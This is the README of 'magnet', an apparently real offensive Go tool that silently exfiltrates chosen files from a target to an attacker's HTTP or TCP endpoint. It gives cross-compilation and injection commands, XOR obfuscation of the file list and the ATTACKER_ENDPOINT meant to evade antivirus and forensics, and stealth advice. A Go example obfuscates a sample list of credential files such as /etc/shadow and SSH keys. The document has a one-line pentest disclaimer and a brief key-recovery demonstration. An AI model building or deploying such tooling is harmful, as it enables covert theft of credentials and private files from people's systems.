# magnet 🧲⚡

Grab interesting files from target

Cross-platform | Stealth | Portable
The library is built to fetch predefined files of interest from a remote device. It assumes that an endpoint under your control (HTTP, or a raw TCP listener depending on the chosen method) is already listening when the program is launched on the target.

Running the program on the target quietly sends you the files you asked for.

There are two ways to use it: inject `magnet` into your own Go program, or build it as a standalone binary. Both are described under Usage.

For educational purposes only, or during a pentest assessment with prior written permission.
## Usage

Everything is decided at compilation time. You need to specify:

- The remote endpoint, where the juicy files are uploaded
- The juicy files: the list of files you want to grab
- The target OS, to fit the target (one of `windows`, `darwin`, `linux`)
- The method used for exfiltration (`http` or `tcp`)

```bash
export KEY=[YOUR_KEY]
export FILES=[FILENAME]
export ENDPOINT=[ATTACKER_ENDPOINT]
export TARGET_OS=[TARGET_OS]
export METHOD=[EXFILTRATION_METHOD]
```

`FILES` and `ENDPOINT` are not passed in clear text: they are the XOR-obfuscated values produced with `lobfuscator` and `KEY` (see "Declare magnet envar" below).
## 🥷 Inject magnet in your Go program

- Add the `magnet` import and declare the variables outside your `main()` function (they are filled in at link time, see the build command below):

```go
import "github.com/ariary/magnet/pkg/magnet"

// Populated at build time via -ldflags "-X 'main.FileList=...'" etc.
var FileList, Key, Endpoint, Method string
```

- Add the magnet payload in `main()`:

```go
debug := false // keep error handling silent (stealth); see Notes for the -thisisdebug flag
sender := magnet.InitMagnetSender(Method)
magnet.Magnet(sender, FileList, Endpoint, Key, debug)
```

- Finally, modify the build command by adding `-ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'"` and `CGO_ENABLED=0` (a static binary, no libc dependency on the target). With `GOOS` set for cross-compilation, the build looks like:

```bash
CGO_ENABLED=0 GOOS=$TARGET_OS go build \
  -ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'" \
  -o magnet .
```

See "Declare magnet envar" below for how `$FILES` and `$ENDPOINT` are produced.
## ⚡ Standalone

To build the `magnet` binary in one step:

```bash
# ensure lobfuscator is in your PATH
./build.sh $TARGET_OS $FILES $ENDPOINT $KEY $METHOD
```

See lobfuscator and the full example below.
## Obfuscation/Encryption

To avoid detection systems (we are, after all, looking for sensitive files), the list of files we want to grab must not appear in clear text within the binary. Hence magnet uses basic XOR encryption, with the key needed to decrypt the list also embedded in the binary. The aim is only to evade AV and detection systems, not to provide a strong encryption scheme: anyone who pulls the key out of the binary, or who guesses a few bytes of plaintext such as `/etc/`, can recover the list.

The same is done for the remote endpoint, to make forensic analysis harder.

`lobfuscator` is the small tool that performs the XOR encryption/decryption. An example to build the obfuscated list:

```bash
cat [FILE] | lobfuscator $KEY > obfuscated.txt
# decrypt: cat obfuscated.txt | lobfuscator -d $KEY
```

Build lobfuscator:

```bash
make build.lobfuscator
```
## Declare magnet envar

Define the `FILES` and `ENDPOINT` envars:

```bash
export FILES=$(cat [FILE] | lobfuscator $KEY)
export ENDPOINT=$(echo "[ENDPOINT]" | lobfuscator $KEY)
```
## Go further

You can also use `lobfuscator` without providing a key. It will then generate a random key the size of the input (so the key never repeats) and print it on stderr, which the command below captures into `keys.txt`:

```bash
# Encrypt with a random key (the key is written to stderr after a ":")
cat samples/linux_juicy_files.txt | ./lobfuscator > encrypted.txt 2>tmp.txt && cat tmp.txt | cut -d ":" -f 2- > keys.txt && rm tmp.txt
# Decrypt using the file containing the key
cat encrypted.txt | ./lobfuscator -d -kf keys.txt
```
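The XOR scheme from "Obfuscation/Encryption" and the random-key mode above, as an added example written for this page (it is not lobfuscator's or magnet's own code). It obfuscates a file list with a short repeating key, decodes it the way the payload must at start-up, shows the keyless mode with a key as long as the input, and demonstrates why the repeating-key variant is evasion rather than encryption: a guessed plaintext prefix gives the key back. Hex encoding of the output, the one-path-per-line list format, the function names and the sample paths and key are all assumptions of this example.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// xorWithKey XORs data with key, repeating the key when it is shorter than
// the data. XOR is its own inverse, so encryption and decryption share it.
func xorWithKey(data, key []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// Obfuscate XORs plaintext with key and hex-encodes the result so it can be
// passed through -ldflags "-X 'main.FileList=...'" as a printable string.
// Hex is this example's choice; lobfuscator's real output encoding is assumed.
func Obfuscate(plain, key []byte) (string, error) {
	if len(key) == 0 {
		return "", errors.New("empty key")
	}
	return hex.EncodeToString(xorWithKey(plain, key)), nil
}

// Deobfuscate reverses Obfuscate: hex-decode, then XOR with the same key.
// The payload does this at start-up, which is why the key must also live in
// the binary and why this only hides strings from scanners.
func Deobfuscate(obf string, key []byte) ([]byte, error) {
	if len(key) == 0 {
		return nil, errors.New("empty key")
	}
	raw, err := hex.DecodeString(obf)
	if err != nil {
		return nil, err
	}
	return xorWithKey(raw, key), nil
}

// RandomKey returns n cryptographically random bytes. With n == len(input)
// the key never repeats, mirroring the keyless lobfuscator mode.
func RandomKey(n int) ([]byte, error) {
	k := make([]byte, n)
	if _, err := rand.Read(k); err != nil {
		return nil, err
	}
	return k, nil
}

// FileList decodes the obfuscated list back into paths, one per line,
// skipping blank lines (assumed list format).
func FileList(obf string, key []byte) ([]string, error) {
	plain, err := Deobfuscate(obf, key)
	if err != nil {
		return nil, err
	}
	var paths []string
	for _, line := range strings.Split(string(plain), "\n") {
		if line = strings.TrimSpace(line); line != "" {
			paths = append(paths, line)
		}
	}
	return paths, nil
}

// RecoverKeyFromKnownPlaintext is the analyst's side: XORing a guessed
// plaintext prefix (e.g. "/etc") against the ciphertext yields that many key
// bytes, with no need to locate the key in the binary.
func RecoverKeyFromKnownPlaintext(obf string, knownPrefix []byte) ([]byte, error) {
	raw, err := hex.DecodeString(obf)
	if err != nil {
		return nil, err
	}
	if len(knownPrefix) > len(raw) {
		return nil, errors.New("prefix longer than ciphertext")
	}
	return xorWithKey(raw[:len(knownPrefix)], knownPrefix), nil
}

func main() {
	// Constructed sample list, the kind of content samples/linux_juicy_files.txt holds.
	list := "/etc/passwd\n/etc/shadow\n/root/.ssh/id_rsa\n"
	key := []byte("k3y!") // constructed 4-byte key

	obf, _ := Obfuscate([]byte(list), key)
	fmt.Println("embedded string:", obf)

	paths, _ := FileList(obf, key)
	fmt.Println("decoded paths:", paths)

	// Known-plaintext attack: "/etc" is 4 bytes, the full key length.
	guessed, _ := RecoverKeyFromKnownPlaintext(obf, []byte("/etc"))
	fmt.Printf("key recovered from '/etc' prefix: %q\n", guessed)
}
```

The short-key form keeps `/etc/passwd` out of a `strings` dump, which is all the page asks of it; the random-key form is a one-time pad over the list, but the pad ships inside the same binary, so it only raises the cost of a quick triage, not of a real analysis.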
## Notes

- For the remote endpoint, I suggest using the `/push` endpoint of a gitar listener.
- The software is built to be stealthy, hence:
  - error handling is not verbose (a hidden flag, `-thisisdebug`, gives more verbosity)
  - I suggest overwriting the usage string in `magnet.go` to fit your attack scenario (for standalone use)
- To enhance binary obfuscation, use `garble` to compile magnet instead of `go` (adapt `build.sh` accordingly)
## To do

- Handle directories
- Use other protocols to send files (ICMP, DNS, SMTP, etc.)
- `magnetgentool` is in the making; it will be used with a `//go:generate` comment to stealthily inject magnet code.